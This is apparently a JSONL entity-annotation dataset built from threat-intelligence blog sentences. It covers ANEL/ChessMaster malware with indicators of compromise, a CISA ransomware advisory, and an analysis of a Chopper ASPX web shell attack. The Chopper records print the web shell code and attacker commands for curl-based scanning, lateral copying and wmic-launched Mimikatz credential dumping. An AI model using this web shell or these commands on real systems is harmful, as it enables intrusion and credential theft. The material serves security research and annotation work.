{"id":3836,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":3837,"text":"Encryption key using blowfish","entities":[],"relations":[],"Comments":[]} {"id":3838,"text":"We initially discovered the malware known as ANEL back in September 2017.","entities":[{"id":11634,"label":"malware","start_offset":45,"end_offset":49},{"id":49693,"label":"TIME","start_offset":58,"end_offset":72}],"relations":[],"Comments":[]} {"id":3839,"text":"At that time, ChessMaster was using ANEL as a backdoor into the target system then injects code into svchost.exe, which then decrypts and activates the embedded backdoor.","entities":[{"id":49694,"label":"malware","start_offset":14,"end_offset":25},{"id":49695,"label":"malware","start_offset":36,"end_offset":40},{"id":49696,"label":"FILEPATH","start_offset":101,"end_offset":112}],"relations":[],"Comments":[]} {"id":3840,"text":"This initial version of ANEL had a hardcoded version labeled “5.0.0 beta1” that contained incomplete code.","entities":[{"id":11641,"label":"malware","start_offset":24,"end_offset":28}],"relations":[],"Comments":[]} {"id":3841,"text":"We noted that this might signify the release of a future variant.","entities":[],"relations":[],"Comments":[]} {"id":3842,"text":"Instead of just one new variant, we discovered four different versions of ANEL: 5.0.0 beta1 5.1.1 rc 5.1.2 rc1 5.2.0 rev1 The different versions contain changes in the ANEL loader and the main ANEL DLL.","entities":[{"id":11645,"label":"malware","start_offset":74,"end_offset":78},{"id":11648,"label":"malware","start_offset":195,"end_offset":199},{"id":11646,"label":"malware","start_offset":170,"end_offset":174}],"relations":[],"Comments":[]} {"id":3843,"text":"The figure below shows a summary of the changes between each version: Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":3844,"text":"Summary of the changes between each version of ANEL","entities":[{"id":49697,"label":"malware","start_offset":47,"end_offset":51}],"relations":[],"Comments":[]} {"id":3845,"text":"Differences with regards to Backdoor commands: CMD ID 5.0.0 beta1\/5.1.1 rc\/5.1.2 rc1 5.2.0 rev1 0x97A168D9697D40DD Save File 0x7CF812296CCC68D5 Upload File 0x652CB1CEFF1C0A00 NA Load New PE file 0x27595F1F74B55278 Save File and Execute If no match above Execute Command or File The differences shown in the table above are subtle but present.","entities":[],"relations":[],"Comments":[]} {"id":3846,"text":"For example, the initial ANEL version, “5.0.0 beta1,” uses a different C&C server compared to the other versions.","entities":[{"id":11660,"label":"malware","start_offset":25,"end_offset":29}],"relations":[],"Comments":[]} {"id":3847,"text":"Once ANEL evolved to “5.1.1 rc,” it changed its file type to an executable, while also changing the C&C server.","entities":[{"id":11661,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} {"id":3848,"text":"The third version we found (5.1.2 rc1) reverts to a DLL file type but retains the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3849,"text":"The fourth version of ANEL (5.2.0 rev1) changes both the export function in the expanded main ANEL DLL and uses a different C&C server.","entities":[{"id":49698,"label":"malware","start_offset":22,"end_offset":39}],"relations":[],"Comments":[]} {"id":3850,"text":"Overall, we can see subtle changes, which indicate that the threat actors behind ANEL are making incremental improvements to the malware to refine it.","entities":[{"id":49699,"label":"malware","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} {"id":3851,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":3852,"text":"Backdoor function differences between ANEL 5.0.0 beta1\/5.1.1 rc\/5.1.2 rc1 (left) and ANEL 5.2.0 rev1 (right)","entities":[{"id":49700,"label":"malware","start_offset":38,"end_offset":73},{"id":49701,"label":"malware","start_offset":85,"end_offset":100}],"relations":[],"Comments":[]} {"id":3853,"text":"Once ANEL enters the user’s system, it will download various tools that could be used for malicious purposes, including password retrieval tools as well as malicious mail services and accessibility tools that will allow it to gather information about the system.","entities":[{"id":49702,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} {"id":3854,"text":"These include Getpass.exe and Mail.exe, which are password and information stealers.","entities":[{"id":49703,"label":"FILEPATH","start_offset":14,"end_offset":25},{"id":49704,"label":"FILEPATH","start_offset":30,"end_offset":38}],"relations":[],"Comments":[]} {"id":3855,"text":"It also downloads the following: Accevent.exe <-> Microsoft Accessible Event Watcher 7.2.0.0 event.dll <-> the loader of ssssss.ddd, (Detected as TROJ_ANELLDR) ssssss.ddd (lena_http.bin) <-> encrypted BKDR_ANEL (Detected as BKDR_ANELENC) ","entities":[{"id":49708,"label":"FILEPATH","start_offset":161,"end_offset":171},{"id":49711,"label":"malware","start_offset":225,"end_offset":237},{"id":49705,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":49706,"label":"FILEPATH","start_offset":94,"end_offset":103},{"id":49707,"label":"FILEPATH","start_offset":122,"end_offset":132},{"id":49709,"label":"FILEPATH","start_offset":173,"end_offset":186},{"id":49710,"label":"malware","start_offset":202,"end_offset":211},{"id":49712,"label":"malware","start_offset":147,"end_offset":159},{"id":49713,"label":"SOFTWARE","start_offset":51,"end_offset":93}],"relations":[],"Comments":[]} {"id":3856,"text":"These three files work together using a common technique call DLL Side-Loading or DLL Hijacking.","entities":[{"id":49714,"label":"attack-pattern","start_offset":62,"end_offset":78},{"id":49715,"label":"attack-pattern","start_offset":82,"end_offset":95}],"relations":[],"Comments":[]} {"id":3857,"text":"In this scenario, accevent.exe is the primary executable, which is usually legitimate.","entities":[{"id":49716,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":3858,"text":"After the execution of accevent.exe, it loads event.dll, which will be placed in the same folder (so it takes loading priority), after which event.dll decrypts and loads the encrypted backdoor ssssss.ddd, which is BKDR_ANEL.","entities":[{"id":49719,"label":"FILEPATH","start_offset":141,"end_offset":150},{"id":49717,"label":"FILEPATH","start_offset":23,"end_offset":35},{"id":49718,"label":"FILEPATH","start_offset":46,"end_offset":55},{"id":49720,"label":"FILEPATH","start_offset":193,"end_offset":203},{"id":49721,"label":"malware","start_offset":214,"end_offset":223}],"relations":[{"id":862,"from_id":49717,"to_id":49718,"type":"downloads"},{"id":863,"from_id":49720,"to_id":49721,"type":"duplicate-of"}],"Comments":[]} {"id":3859,"text":"When we analyzed ANEL 5.1.1 rc, encrypted ANEL 5.1.2 rc1 was downloaded and executed.","entities":[{"id":49722,"label":"malware","start_offset":17,"end_offset":30},{"id":49723,"label":"malware","start_offset":42,"end_offset":56}],"relations":[],"Comments":[]} {"id":3860,"text":"Short-term mitigation","entities":[],"relations":[],"Comments":[]} {"id":3861,"text":"When the user opens the document DDEAUTO or Link Auto Update, Office will display a message.","entities":[{"id":49724,"label":"SOFTWARE","start_offset":62,"end_offset":68}],"relations":[],"Comments":[]} {"id":3862,"text":"If the user clicks on the “No” button, malicious activity will not initiate.","entities":[],"relations":[],"Comments":[]} {"id":3863,"text":"Figure 13: Popup message when users open the document that abuses DDEAUTO Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":3864,"text":"Popup message when the user opens the document that abuses Link Auto Update Koadic sends its own JavaScript code as plain text.","entities":[{"id":49725,"label":"malware","start_offset":76,"end_offset":82}],"relations":[],"Comments":[]} {"id":3865,"text":"The suspect communication allows us to detect the traffic.","entities":[],"relations":[],"Comments":[]} {"id":3866,"text":" Figure 15. Koadic’s communication traffic Medium- to long-term mitigation","entities":[{"id":49726,"label":"malware","start_offset":12,"end_offset":18}],"relations":[],"Comments":[]} {"id":3867,"text":"At first glance, it seems ChessMaster’s evolution over the past few months involves subtle changes.","entities":[{"id":49727,"label":"malware","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} {"id":3868,"text":"However, the constant addition and changing of features and attack vectors indicate that the attackers behind the campaign are unlikely to stop and are constantly looking to evolve their tools and tactics.","entities":[],"relations":[],"Comments":[]} {"id":3869,"text":" Organizations can implement various techniques and best practices to defend against targeted attacks, such as regular patching to prevent vulnerability exploitation and using tools that provide protection across different network levels.","entities":[],"relations":[],"Comments":[]} {"id":3870,"text":"Solutions that feature behavior monitoring, application control, email gateway monitoring, and intrusion\/detection systems can help with this.","entities":[],"relations":[],"Comments":[]} {"id":3871,"text":"Given how cybercriminal tools, tactics and procedures are evolving, organizations will have to go beyond their typical day-to-day security requirements and find a way to preempt attacks.","entities":[],"relations":[],"Comments":[]} {"id":3872,"text":"Thus, there is a pressing need to detect and address threats via a proactive incident response strategy.","entities":[],"relations":[],"Comments":[]} {"id":3873,"text":"Essentially, this involves creating a remediation plan for effectively combating the threat and using round-the-clock intrusion detection and threat analysis to prevent attacks from entering the system.","entities":[],"relations":[],"Comments":[]} {"id":3874,"text":"A proactive strategy can be much more effective for targeted attacks, as these kinds of attacks are often designed to be elusive and difficult to detect, thus the need to scope them out.","entities":[],"relations":[],"Comments":[]} {"id":3875,"text":"A comprehensive security strategy that involves proactive incident response will need the input of both decision makers and tech-savvy personnel, as they will need to be on the same page for it to be effective.","entities":[],"relations":[],"Comments":[]} {"id":3876,"text":"In addition to implementing both mitigation techniques and proactive strategies, organizations can also strengthen their security by employing solutions such Trend Micro™ Deep Security™ and TippingPoint, which protects endpoints from threats that abuse vulnerabilities.","entities":[{"id":49728,"label":"identity","start_offset":158,"end_offset":169},{"id":49729,"label":"SOFTWARE","start_offset":171,"end_offset":184},{"id":49730,"label":"SOFTWARE","start_offset":190,"end_offset":202}],"relations":[],"Comments":[]} {"id":3877,"text":"In addition, comprehensive security solutions can be used to protect organizations from attacks.","entities":[],"relations":[],"Comments":[]} {"id":3878,"text":"These include Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security, which can protect users and businesses from these threats by detecting malicious files, well as blocking all related malicious URLs.","entities":[{"id":49731,"label":"identity","start_offset":14,"end_offset":25},{"id":49732,"label":"identity","start_offset":53,"end_offset":64},{"id":49733,"label":"SOFTWARE","start_offset":66,"end_offset":89},{"id":49734,"label":"SOFTWARE","start_offset":94,"end_offset":104},{"id":49735,"label":"SOFTWARE","start_offset":106,"end_offset":123}],"relations":[],"Comments":[]} {"id":3879,"text":"Trend Micro Deep Discovery™ can protect enterprises by detecting malicious attachment and URLs.","entities":[{"id":49736,"label":"SOFTWARE","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} {"id":3880,"text":"Trend Micro OfficeScan™ with XGen™ endpoint security","entities":[{"id":49737,"label":"SOFTWARE","start_offset":0,"end_offset":34}],"relations":[],"Comments":[]} {"id":3881,"text":"infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against all kinds of threats.","entities":[],"relations":[],"Comments":[]} {"id":3882,"text":"A more detailed analysis of the Command-and-Control communication flow of ANEL can be found in this technical brief.","entities":[{"id":49738,"label":"malware","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} {"id":3883,"text":"Indicators of Compromise Hash Downloader used in the campaign: 76b1f75ee15273d1226392db3d8f1b2aed467c2875e11d9c14fd18120afc223a 4edcff56f586bd69585e0c9d1d7ff4bfb1a2dac6e2a9588f155015ececbe1275 1b5a1751960b2c08631601b07e3294e4c84dfd71896453b65a45e4396a6377cc Hashes detected as part of the BKDR_ANEL Family: 5.0.0 beta1 af1b2cd8580650d826f48ad824deef3749a7db6fde1c7e1dc115c6b0a7dfa0dd 5.1.1 rc 2371f5b63b1e44ca52ce8140840f3a8b01b7e3002f0a7f0d61aecf539566e6a1 5.1.2 rc1 05dd407018bd316090adaea0855bd7f7c72d9ce4380dd4bc0feadc6566a36170 5.2.0 rev1 00030ec8cce1f21120ebf5b90ec408b59166bbc3fba17ebae0fc23b3ca27bf4f lena_http.bin 303f9c00edb4c6082542e456a30a2446a259b8bb9fb6b0f76ff318d5905e429c Tools used in the campaign: Getpass.exe 52a8557c8cdd5d925453383934cb10a85b117522b95c6d28ca097632ac8bc10d event.dll 6c3224dbf6bbabe058b0ab46233c9d35c970aa83e8c4bdffb85d78e31159d489 mail.exe 2f76c9242d5ad2b1f941fb47c94c80c1ce647df4d2d37ca2351864286b0bb3d8 URLs and IP Addresses related to the campaign: www[.]nasnnones[.]com trems[.]rvenee[.]com contacts[.]rvenee[.]com 91[.]207[.]7[.]91 89[.]18[.]27[.]159 89[.]37[.]226[.]108 185[.]25[.]51[.]116 185[.]81[.]113[.]95 185[.]144[.]83[.]82 185[.]153[.]198[.]58 185[.]159[.]129[.]226 Tags Malware | APT & Targeted Attacks | Endpoints | Cyber Crime | Research | Network","entities":[{"id":11786,"label":"SHA2","start_offset":194,"end_offset":258},{"id":11787,"label":"SHA2","start_offset":322,"end_offset":386},{"id":11788,"label":"SHA2","start_offset":398,"end_offset":462},{"id":11790,"label":"SHA2","start_offset":553,"end_offset":617},{"id":11792,"label":"SHA2","start_offset":634,"end_offset":698},{"id":11795,"label":"SHA2","start_offset":818,"end_offset":882},{"id":11799,"label":"IPV4","start_offset":1075,"end_offset":1092},{"id":11800,"label":"IPV4","start_offset":1093,"end_offset":1111},{"id":11801,"label":"IPV4","start_offset":1112,"end_offset":1131},{"id":11802,"label":"IPV4","start_offset":1132,"end_offset":1151},{"id":11803,"label":"IPV4","start_offset":1152,"end_offset":1171},{"id":11804,"label":"IPV4","start_offset":1172,"end_offset":1191},{"id":11805,"label":"IPV4","start_offset":1192,"end_offset":1212},{"id":11806,"label":"IPV4","start_offset":1213,"end_offset":1234},{"id":11784,"label":"SHA2","start_offset":64,"end_offset":128},{"id":11785,"label":"SHA2","start_offset":129,"end_offset":193},{"id":11789,"label":"SHA2","start_offset":475,"end_offset":539},{"id":11794,"label":"SHA2","start_offset":741,"end_offset":805},{"id":11796,"label":"SHA2","start_offset":894,"end_offset":958},{"id":11791,"label":"FILEPATH","start_offset":619,"end_offset":632},{"id":49741,"label":"DOMAIN","start_offset":1051,"end_offset":1074},{"id":49742,"label":"FILEPATH","start_offset":807,"end_offset":816},{"id":49743,"label":"FILEPATH","start_offset":884,"end_offset":892},{"id":49739,"label":"DOMAIN","start_offset":1008,"end_offset":1029},{"id":49740,"label":"DOMAIN","start_offset":1030,"end_offset":1050}],"relations":[],"Comments":[]} {"id":3884,"text":"Last June 9, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released the Rising Ransomware Threat to OT Assets, which addresses the recent rise in ransomware attacks targeting operational assets (OT) and control systems.","entities":[{"id":49744,"label":"TIME","start_offset":5,"end_offset":17},{"id":49745,"label":"identity","start_offset":23,"end_offset":78}],"relations":[],"Comments":[]} {"id":3885,"text":"The guidance provides steps to prepare for, mitigate against, and respond to attacks.","entities":[],"relations":[],"Comments":[]} {"id":3886,"text":"It also identifies how dependencies between an enterprise's IT and OT systems can give attackers a path.","entities":[],"relations":[],"Comments":[]} {"id":3887,"text":"Lastly, the document thoroughly explains how to decrease the risk of severe business degradation if affected by a ransomware attack.","entities":[],"relations":[],"Comments":[]} {"id":3888,"text":"To prepare for ransomware attacks, CISA recommends enterprises determine their critical operational processes' reliance on key IT infrastructure and identify a resilience plan for when access control is lost.","entities":[{"id":49746,"label":"identity","start_offset":35,"end_offset":39}],"relations":[],"Comments":[]} {"id":3889,"text":"They should also exercise an incident response plan and Implement regular data backup procedures on both IT and OT networks.","entities":[],"relations":[],"Comments":[]} {"id":3890,"text":"For mitigating and responding to an attack, organizations must practice good cyber hygiene by updating software, implementing an allow listing, and enabling strong spam filters.","entities":[],"relations":[],"Comments":[]} {"id":3891,"text":"Organizations must also identify which systems were affected and immediately isolate them and triage the impacted systems for restorations and recovery.","entities":[],"relations":[],"Comments":[]} {"id":3892,"text":"They must also confer with teams to develop and document what has occurred.","entities":[],"relations":[],"Comments":[]} {"id":3893,"text":"According to the agency, critical infrastructure owners and operators should also adopt an \"heightened state of awareness\".","entities":[],"relations":[],"Comments":[]} {"id":3894,"text":"CISA also encourages them to identify critical processes that must not be interrupted to provide essential services, develop and regularly test workarounds and\/or manual controls that ensure critical processes and industrial control system (ICS) network supporting them.","entities":[{"id":49747,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3895,"text":"CISA recommends critical infrastructure owners to implement robust network segmentation between IT and OT networks and make sure backup procedures are executed and tested regularly.","entities":[{"id":49748,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3896,"text":"Lastly, backups should be isolated from network connections.","entities":[],"relations":[],"Comments":[]} {"id":3897,"text":"The fact sheet comes after numerous ransomware attacks on key critical infrastructures in the US and abroad, including the attack on Colonial Pipeline by DarkSide.","entities":[{"id":49749,"label":"location","start_offset":94,"end_offset":96},{"id":49751,"label":"threat-actor","start_offset":154,"end_offset":162},{"id":49750,"label":"identity","start_offset":133,"end_offset":150}],"relations":[{"id":864,"from_id":49751,"to_id":49750,"type":"targets"}],"Comments":[]} {"id":3898,"text":"In 2019, Trend Micro conducted research analyzing cyberattacks by building and using a factory honeypot, mimicking a factory environment.","entities":[{"id":49752,"label":"TIME","start_offset":3,"end_offset":7},{"id":49753,"label":"identity","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} {"id":3899,"text":"The study, Fake Company, Real Threats, revealed that over 20 attacks were observed during 240 days- six of which affected factory productivity.","entities":[],"relations":[],"Comments":[]} {"id":3900,"text":"This shows how vulnerable smart factories are when it comes to various cyberattacks, such as ransomware.","entities":[],"relations":[],"Comments":[]} {"id":3901,"text":"Ransomware incidents are federal crimes, according to the agency.","entities":[],"relations":[],"Comments":[]} {"id":3902,"text":"Enterprises, especially critical infrastructure establishments, must report the attack to law enforcement to help bring the attackers to justice.","entities":[],"relations":[],"Comments":[]} {"id":3903,"text":"Moreover, decision-makers and stakeholders should have a better understanding of cybersecurity and its role in securing their operations and the safety of consumers.","entities":[],"relations":[],"Comments":[]} {"id":3904,"text":"To learn more about how to protect smart factories and their critical operations, read Trend Micro's expertly crafted best practices and solutions: Smart Factory Security Solutions Trend Micro Best Practices for Securing Smart Factories Tags Latest News | ICS OT | APT & Targeted Attacks | Ransomware | Articles, News, Reports | Cyber Threats","entities":[{"id":49754,"label":"identity","start_offset":87,"end_offset":98}],"relations":[],"Comments":[]} {"id":3905,"text":"Web shells, in their simplicity and straightforwardness, are highly potent when it comes to compromising systems and environments.","entities":[],"relations":[],"Comments":[]} {"id":3906,"text":"These malicious code pieces can be written in ASP, PHP, and JSP, or any script that can execute a system command with a parameter that can pass through the web.","entities":[],"relations":[],"Comments":[]} {"id":3907,"text":"Web shells can be embedded on web servers and can be used by malicious actors to launch arbitrary code.","entities":[{"id":49755,"label":"attack-pattern","start_offset":81,"end_offset":102},{"id":49756,"label":"attack-pattern","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3908,"text":"In as little as 15 bytes, web shells can enable remote administration of an infected machine or system.","entities":[{"id":49757,"label":"attack-pattern","start_offset":26,"end_offset":36}],"relations":[],"Comments":[]} {"id":3909,"text":"Threats such as this can be difficult to detect even with multiple security layers — especially if they are not consolidated. In this blog, we will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as Backdoor.ASP.WEBSHELL.UWMANA). Technical Analysis","entities":[{"id":49758,"label":"malware","start_offset":197,"end_offset":219},{"id":49759,"label":"malware","start_offset":248,"end_offset":276},{"id":49760,"label":"identity","start_offset":233,"end_offset":244}],"relations":[],"Comments":[]} {"id":3910,"text":"Initial access","entities":[],"relations":[],"Comments":[]} {"id":3911,"text":"Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability.","entities":[{"id":49762,"label":"vulnerability","start_offset":99,"end_offset":138},{"id":49763,"label":"malware","start_offset":32,"end_offset":49}],"relations":[{"id":865,"from_id":49763,"to_id":49762,"type":"exploits"}],"Comments":[]} {"id":3912,"text":"One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug.","entities":[{"id":49764,"label":"SOFTWARE","start_offset":33,"end_offset":58},{"id":49765,"label":"vulnerability","start_offset":62,"end_offset":75},{"id":49766,"label":"attack-pattern","start_offset":79,"end_offset":100}],"relations":[{"id":866,"from_id":49764,"to_id":49765,"type":"has"},{"id":867,"from_id":49765,"to_id":49766,"type":"uses"}],"Comments":[]} {"id":3913,"text":"Microsoft issued a patch for this vulnerability in February 2020.","entities":[{"id":49768,"label":"TIME","start_offset":52,"end_offset":65},{"id":49767,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":3914,"text":"However, the malicious actors behind this attack drop the Chopper web shell in the web directory folder to establish persistence.","entities":[{"id":49769,"label":"malware","start_offset":58,"end_offset":75}],"relations":[],"Comments":[]} {"id":3915,"text":"Through the ASPX file, malicious actors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands through them.","entities":[{"id":49770,"label":"SOFTWARE","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} {"id":3916,"text":"Outlook Web App (Web Directory) - D:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\\premium.aspx","entities":[{"id":49771,"label":"SOFTWARE","start_offset":0,"end_offset":15},{"id":49772,"label":"FILEPATH","start_offset":36,"end_offset":149}],"relations":[],"Comments":[]} {"id":3917,"text":"The attack features the following script:","entities":[],"relations":[],"Comments":[]} {"id":3918,"text":"<%@ Page Language=\"Jscript\" Debug=true%>","entities":[],"relations":[],"Comments":[]} {"id":3919,"text":"var","entities":[],"relations":[],"Comments":[]} {"id":3920,"text":"System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=\"))","entities":[],"relations":[],"Comments":[]} {"id":3921,"text":"var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\")); var c=eval(a,b); eval(c,b); %>","entities":[],"relations":[],"Comments":[]} {"id":3922,"text":"When simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the parameter to be executed:","entities":[],"relations":[],"Comments":[]} {"id":3923,"text":"<%@ Page Language=\"Jscript\"%><%eval(Request.Form[\"Command\"],\"unsafe\");%> We’ve observed that in some cases, malicious actors insert this short script to avoid detection: Figure 1. A short script","entities":[],"relations":[],"Comments":[]} {"id":3924,"text":"inserted by malicious actors to avoid detection ","entities":[],"relations":[],"Comments":[]} {"id":3925,"text":"User Activity Checking Once Chopper successfully infects a system, the malicious actor will issue a query user (quser) command in an attempt to identify the primary user or those who are currently logged in as users in the system.","entities":[{"id":49773,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} {"id":3926,"text":"Based on our observation, the quser command was used routinely throughout the attack to determine active remote sessions.","entities":[],"relations":[],"Comments":[]} {"id":3927,"text":" Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":3928,"text":"The quser command is used to identify active remote sessions.","entities":[],"relations":[],"Comments":[]} {"id":3929,"text":" Deobfuscation technique","entities":[],"relations":[],"Comments":[]} {"id":3930,"text":"To deploy its tools, it uses the expand command to extract package files dropped in the system.","entities":[],"relations":[],"Comments":[]} {"id":3931,"text":"expand {filename}.ex_ {filename}.dat expand {filename}.ex_ {filename}.exe","entities":[],"relations":[],"Comments":[]} {"id":3932,"text":"We saw a noticeable difference with this attack compared to other Chopper attacks — its use of the .dat file extension, which is commonly used for data storage purposes, such as in a user profile’s ntuser.dat.","entities":[{"id":49774,"label":"malware","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} {"id":3933,"text":"In this particular Chopper attack, the .dat files are used as executables.","entities":[{"id":49775,"label":"malware","start_offset":19,"end_offset":26}],"relations":[],"Comments":[]} {"id":3934,"text":"Lateral movement","entities":[{"id":49776,"label":"attack-pattern","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":3935,"text":"It proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.","entities":[{"id":49777,"label":"malware","start_offset":30,"end_offset":47}],"relations":[],"Comments":[]} {"id":3936,"text":"copy premium.aspx \"\\\\{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium","entities":[{"id":49778,"label":"FILEPATH","start_offset":19,"end_offset":132},{"id":49779,"label":"FILEPATH","start_offset":5,"end_offset":17}],"relations":[],"Comments":[]} {"id":3937,"text":"It also scans for vulnerabilities across the network by using an installed tool, Hacktool.Win32.CATLIKE.A, and a legitimate cURL, C:\\temp\\curl.dat.","entities":[{"id":49780,"label":"malware","start_offset":81,"end_offset":105},{"id":49781,"label":"FILEPATH","start_offset":130,"end_offset":146}],"relations":[],"Comments":[]} {"id":3938,"text":" It specifically scans for web server-related vulnerabilities and password weaknesses in Apache Tomcat, Citrix, and phpMyAdmin applications.","entities":[{"id":49783,"label":"SOFTWARE","start_offset":104,"end_offset":110},{"id":49784,"label":"SOFTWARE","start_offset":116,"end_offset":126},{"id":49782,"label":"SOFTWARE","start_offset":89,"end_offset":102}],"relations":[],"Comments":[]} {"id":3939,"text":"Application\/Port Command Oracle WebLogic curl.dat -v -H 'Content-Type: text\/","entities":[{"id":49785,"label":"SOFTWARE","start_offset":27,"end_offset":42},{"id":49786,"label":"FILEPATH","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} {"id":3940,"text":"xml;charset","entities":[],"relations":[],"Comments":[]} {"id":3941,"text":"UTF-8","entities":[],"relations":[],"Comments":[]} {"id":3942,"text":"http:\/\/{ip address\\]:7001\/wls-wsat\/CoordinatorPortType Oracle Console curl.dat -vv http:\/\/{ip address}:7001\/console\/j_security_check -d j_username={username}&j_password={password}&submit=Login\"","entities":[{"id":49789,"label":"FILEPATH","start_offset":72,"end_offset":81},{"id":49787,"label":"URL","start_offset":0,"end_offset":54},{"id":49788,"label":"URL","start_offset":85,"end_offset":134}],"relations":[],"Comments":[]} {"id":3943,"text":" PHPMyAdmin curl.dat -vv --connect-timeout 2 {ip address}\/phpmyadmin Apache Tomcat s.dat -u http:\/\/{ip address}:8080\/manager\/html Ports 7001 9095 5556 8080 s.dat -i 10.217.229.189 -p {ports} Table 1.","entities":[{"id":49790,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":49791,"label":"FILEPATH","start_offset":86,"end_offset":91},{"id":49792,"label":"FILEPATH","start_offset":95,"end_offset":132},{"id":49793,"label":"IPV4","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} {"id":3944,"text":"Commands used to scan for web server-related vulnerabilities and passwords on certain applications and ports","entities":[],"relations":[],"Comments":[]} {"id":3945,"text":"We saw that this attack also uses the WMI command line (wmic) utility to perform remote process execution on other infected endpoints.","entities":[],"relations":[],"Comments":[]} {"id":3946,"text":" Execution of arbitrary commands via session id","entities":[],"relations":[],"Comments":[]} {"id":3947,"text":"Successful exploitation of CVE-2020-0688 gives Chopper access to system privileges.","entities":[{"id":49794,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":49795,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} {"id":3948,"text":"In one of the endpoints, it will drop and execute Trojan.Win32.PRIVESC.A.","entities":[{"id":49796,"label":"malware","start_offset":50,"end_offset":72}],"relations":[],"Comments":[]} {"id":3949,"text":"This trojan requires to be run under a user with SeTcbPrivilege.","entities":[],"relations":[],"Comments":[]} {"id":3950,"text":"It allows an attacker to see all Windows sessions and can execute arbitrary commands on the session via session id.","entities":[],"relations":[],"Comments":[]} {"id":3951,"text":" Figure 3. Examples of arbitrary commands being performed on the session via session id Discovery","entities":[],"relations":[],"Comments":[]} {"id":3952,"text":"For its discovery, it uses typical Windows command-line tools such as nltest, ping, whoami, netstat, net, nslookup, hostname, and tasklist, which are commonly used in other attacks.","entities":[{"id":49799,"label":"tools","start_offset":84,"end_offset":90},{"id":49797,"label":"tools","start_offset":70,"end_offset":76},{"id":49798,"label":"tools","start_offset":78,"end_offset":82},{"id":49804,"label":"tools","start_offset":131,"end_offset":139},{"id":49801,"label":"tools","start_offset":102,"end_offset":105},{"id":49802,"label":"tools","start_offset":107,"end_offset":115},{"id":49800,"label":"tools","start_offset":93,"end_offset":100},{"id":49803,"label":"tools","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":3953,"text":"In addition, a publicly available JoeWare domain tool called LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.","entities":[{"id":49805,"label":"FILEPATH","start_offset":61,"end_offset":67},{"id":49806,"label":"tools","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} {"id":3954,"text":"Credential access","entities":[],"relations":[],"Comments":[]} {"id":3955,"text":"For obtaining user credentials, the attackers used HackTool.MSIL.Mimikatz.AF, a modified version of the open-sourced application Mimikatz, using the following parameters: x, xxx, xxxx, xxxasd. wmic \/node:{ip address} process call create \"cmd.exe \/c c:\\users\\mpBD6D42.dat xxxasd -pass > c:\\users\\23.txt Collection","entities":[{"id":11981,"label":"FILEPATH","start_offset":238,"end_offset":245},{"id":49807,"label":"malware","start_offset":51,"end_offset":76},{"id":49808,"label":"tools","start_offset":129,"end_offset":137},{"id":49809,"label":"FILEPATH","start_offset":249,"end_offset":270},{"id":49810,"label":"FILEPATH","start_offset":286,"end_offset":301}],"relations":[],"Comments":[]} {"id":3956,"text":"The attackers use wevtutil.exe to query security-related events from a target username and export it as a q.txt file.","entities":[{"id":49811,"label":"FILEPATH","start_offset":18,"end_offset":30},{"id":49812,"label":"FILEPATH","start_offset":106,"end_offset":111}],"relations":[],"Comments":[]} {"id":3957,"text":"For packaging stolen credentials and other logs, it uses the makecab command instead of a third-party application such as rar.exe.","entities":[{"id":49814,"label":"FILEPATH","start_offset":122,"end_offset":129},{"id":49813,"label":"attack-pattern","start_offset":14,"end_offset":32}],"relations":[],"Comments":[]} {"id":3958,"text":"· makecab a.txt > 111 · makecab aaa2.txt >1","entities":[{"id":49816,"label":"FILEPATH","start_offset":46,"end_offset":54},{"id":49815,"label":"FILEPATH","start_offset":17,"end_offset":22}],"relations":[],"Comments":[]} {"id":3959,"text":"The attacker uses installed security components or applications as filenames to hide in plain sight.","entities":[],"relations":[],"Comments":[]} {"id":3960,"text":"· C:\\Program Files\\Trend Micro\\ ams 